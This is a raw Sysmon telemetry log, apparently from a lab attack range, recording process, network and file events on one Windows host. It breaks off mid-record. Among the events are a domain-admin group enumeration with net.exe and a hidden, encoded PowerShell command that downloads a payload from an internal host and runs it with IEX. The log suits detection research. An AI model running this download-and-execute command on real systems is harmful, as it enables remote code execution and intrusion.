21:58:28.452{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128402Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128401Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-4130-611D-9D00-00000000C801}31603656C:\Windows\system32\csrss.exe{B81B27B7-8384-613A-D696-03000000C801}6612C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.452{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-8384-613A-D696-03000000C801}6612C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9daab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9d93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f8e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff3f93(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5cf89b6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fb14e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4ff335e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c503aabb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b1bafa4e567963a567180237d9e816e6\Microsoft.PowerShell.Commands.Utility.ni.dll+ffff66c0(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbf41e(wow64) 154100x800000000000000035128399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:28.460{B81B27B7-8384-613A-D696-03000000C801}6612C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" group "enterprise admins" /domainC:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -exec bypass -Noninteractive -windowstyle hidden -e WwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgBTAGUAcgB2AGUAcgBDAGUAcgB0AGkAZgBpAGMAYQB0AGUAVgBhAGwAaQBkAGEAdABpAG8AbgBDAGEAbABsAGIAYQBjAGsAIAA9ACAAewAkAHQAcgB1AGUAfQA7ACQATQBTAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMQAwAC4AMAAuADEALgAxADYALwBiAGgALwBzAHkAbgBjAC8AYQBvAGwALwBfAHIAcAAnACkAKQApADsASQBFAFgAIAAkAE0AUwA= 354300x800000000000000035128429Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.668{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62155-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128428Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.667{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62154-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128427Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.667{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62153-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128426Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.661{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62152-false10.0.1.14WIN-DC-128445microsoft-ds 354300x800000000000000035128425Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.618{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62151-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035128424Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.271{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62150-false10.0.1.12-8000- 23542300x800000000000000035128423Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:29.472{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E22FCF8C22D97C228F23BC0BD6CD971F,SHA256=AF7E594136D97ABFE31DEBD8200D24F6CA5D3E54106F9C0B6E81E1931282839B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128422Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:29.470{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E43C4E5FEB6A2692FE9619F71C751903,SHA256=AE7749EBCE2931CCCC036D4633878089B0794F9B03906D9D46C73FD63447B09E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128421Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:29.120{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E53092686F2328C3FF6F20BAD3C5C709,SHA256=2BB53E8954CEF8AC35DFB6629911672034E569D1D4B17EB8DE23370E1D6BE916,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128431Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.887{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62156-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128430Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:30.134{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36AB7E27354073B56A435B2BC7C298E5,SHA256=A76B332E9B00B71C1EBD6DFBA4AB63E0A59CBA3DAA898907AF8C3FE405DC4F15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128432Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:31.166{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1616DAC2599602C7BA0979C083C25A0E,SHA256=85962666E28F6BEC44F195767B4E8FA632FA150C4BFCB046F3E88B72376E9CAF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128433Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:32.184{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9981486F648DE8348FB29100416058EA,SHA256=51CB2E213E0D5FD25E0E3C1539021BAE9E6D41AF3180674638CAD834B73DB2CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:33.199{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA198E4C9D16102A202827C000FDF06,SHA256=05725BF79C6D47EC8930F358EE9D0DB95924D66DBA0E7E5BE8925C153ACE940B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:34.944{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A9CECA108D26A8CC6FE4CDC5CC95B3CE,SHA256=2CF652397E9B31E14A8690B4169DCAE683F1B08F0CE7DB309C40CDD0CC389985,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:34.214{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECE435F3BA264B454E19FBB7184FD1C9,SHA256=C7379DDAB8253C56722EB26BAAE152F1E6593161769E4ECC0008577CB73926CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:35.228{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61134DF29EA5F11480589AB578FE938D,SHA256=01DD3EADA87CB4245623BF35D4A834EC3ABBEF1DC6025792297693481973E04D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:59.344{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62157-false10.0.1.12-8000- 23542300x800000000000000035128440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:36.244{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=520F386B44A8678CDD3777D34917D78A,SHA256=8C48604DCFC3A40ABE0C8A9186F559DE596935CDD5E2F3BF94D97E4D629CF021,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:59.897{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62158-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128442Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:37.995{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=BE6B1503F88461F76E8A97AE3F570247,SHA256=CE2BF4ECEB4E5D9808DAF88355E356AD76BC3308C3FEDB5F47A842A370DF66C2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:37.260{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6ADFB2D5AE8014D3E92FE42771B3207E,SHA256=2F361E1CA19BC35E1160066CE864E73A25AAF77531BDA1A4840968CE6EAB5987,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128443Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:38.279{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9614D84FB16CFCD7DB53833A88C1428,SHA256=8CF001DDAC0FBCB4C4248E955A5CA30B8374598D5F74E08D6332CCD6A091D763,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128445Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:39.762{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BABB7962484F28AB93E546F40B0226F2,SHA256=7E0C2AC4108A4F7E9D1154371EDF969690BF384B2F019505DC4133E789A4D445,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128444Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:39.294{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9381FC898AEDE6DF271F07D69799AD84,SHA256=D556000B8E404661A60B625FE0E9A12A8754FB872074B0DCA2EE4093C6CF64A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128456Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.539{B81B27B7-8390-613A-D896-03000000C801}59444684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128455Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8390-613A-D896-03000000C801}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128454Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128453Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128452Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128451Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128450Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-8390-613A-D896-03000000C801}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035128449Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:40.361{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8390-613A-D896-03000000C801}5944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program 